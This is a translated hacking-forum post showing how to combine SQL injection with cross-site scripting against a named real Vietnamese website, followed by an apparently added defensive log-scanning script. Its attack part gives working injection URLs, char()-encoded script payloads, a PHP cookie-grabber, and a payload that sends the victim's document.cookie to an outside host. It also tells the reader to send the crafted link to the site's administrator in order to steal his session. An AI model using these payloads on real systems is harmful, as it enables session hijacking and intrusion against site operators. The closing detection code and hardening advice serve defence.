Anken - XFS - XSS From SQL - Y!m: This_Love_No1
Today I went on Exploit-db and read a few articles on web hacking that I found quite good, so I have roughly translated a few of them here for everyone to read.
First:
String:
Code:
<script>alert('Hacked By Archimonde')</script>
ASCII:
Code:
char(60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 39, 72, 97, 99, 107, 101, 100, 32, 66, 121, 32, 65, 114, 99, 104, 105, 109, 111, 110, 100, 101, 39, 41, 60, 47, 115, 99, 114, 105, 112, 116, 62)
TheSunOfVN sent me a site that is vulnerable to SQLi:
Code:
http://www.masco.com.vn/?act=product&catalogueid=10 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
TheSunOfVN said it is number 2, so:
Code:
http://www.masco.com.vn/?act=product&catalogueid=10 union all select 1,char(60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 39, 72, 97, 99, 107, 101, 100, 32, 66, 121, 32, 65, 114, 99, 104, 105, 109, 111, 110, 100, 101, 39, 41, 60, 47, 115, 99, 114, 105, 112, 116, 62),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
This is XSS.
Second:
Create a PHP file, cookie.php for example:
PHP Code:
<?php
$cookies = $_GET["cookie"];
if($cookies)
{
$grab = fopen("grab.txt","a");
fputs($grab, $cookies . "
");
fclose($grab);
}
?>
String:
Code:
<SCRIPT>location.href='http://www.conchim.com/cookie.php?#cookie='+escape(document.cookie)</SCRIPT>
ASCII:
Code:
char(60, 83, 67, 82, 73, 80, 84, 62, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 39, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 99, 111, 110, 99, 104, 105, 109, 46, 99, 111, 109, 47, 99, 111, 111, 107, 105, 101, 46, 112, 104, 112, 63, 35, 99, 111, 111, 107, 105, 101, 61, 39, 43, 101, 115, 99, 97, 112, 101, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 41, 60, 47, 83, 67, 82, 73, 80, 84, 62)
Then report it to the admin and send him this link:
Code:
http://www.masco.com.vn/?act=product&catalogueid=10 union all select 1,char(60, 83, 67, 82, 73, 80, 84, 62, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 39, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 99, 111, 110, 99, 104, 105, 109, 46, 99, 111, 109, 47, 99, 111, 111, 107, 105, 101, 46, 112, 104, 112, 63, 35, 99, 111, 111, 107, 105, 101, 61, 39, 43, 101, 115, 99, 97, 112, 101, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 41, 60, 47, 83, 67, 82, 73, 80, 84, 62),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
And with that, we have his cookie in the file grab.txt.
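Seen from the defending side, both requests above leave the same trace in the web-server log: a UNION SELECT whose char(...) list decodes to script markup. The following is an added example, not part of the original post; the function names and the sample request targets are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# char(60, 115, ...) as in the URLs above: a comma-separated list of byte values.
CHAR_CALL = re.compile(r"\bchar\s*\(\s*(\d{1,3}(?:\s*,\s*\d{1,3})*)\s*\)", re.I)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
# Markup that has no business inside a SQL string constant in a request URL.
HTML_MARKERS = re.compile(r"<\s*/?\s*script|document\.cookie|location\.href", re.I)

# Constructed sample request targets (values made up for this example).
SAMPLE = [
    "/?act=product&catalogueid=10",
    "/?act=product&catalogueid=10%20union%20all%20select%201,"
    "char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,"
    "60,47,115,99,114,105,112,116,62),3--",
    "/?act=product&catalogueid=10+union+all+select+1,char(97,%2098),3--",
]

def decode_char_calls(query):
    """Return the decoded text of every char(...) list found in a query string."""
    decoded = []
    for match in CHAR_CALL.finditer(query):
        codes = [int(n) for n in match.group(1).split(",")]
        if all(c < 256 for c in codes):
            decoded.append(bytes(codes).decode("latin-1"))
    return decoded

def inspect_request(target):
    """Inspect one logged request target and report what its query contains."""
    # Logs hold the percent-encoded form, so decode before matching.
    query = unquote_plus(urlsplit(target).query)
    decoded = decode_char_calls(query)
    return {
        "union_select": bool(UNION_SELECT.search(query)),
        "decoded": decoded,
        "html_in_char": any(HTML_MARKERS.search(d) for d in decoded),
    }

if __name__ == "__main__":
    for target in SAMPLE:
        print(inspect_request(target))
```

On the application side, the fix is a parameterised query for `catalogueid` plus HTML-encoding of every value written into the page. Marking the session cookie HttpOnly keeps `document.cookie` from reading it even if markup does get through.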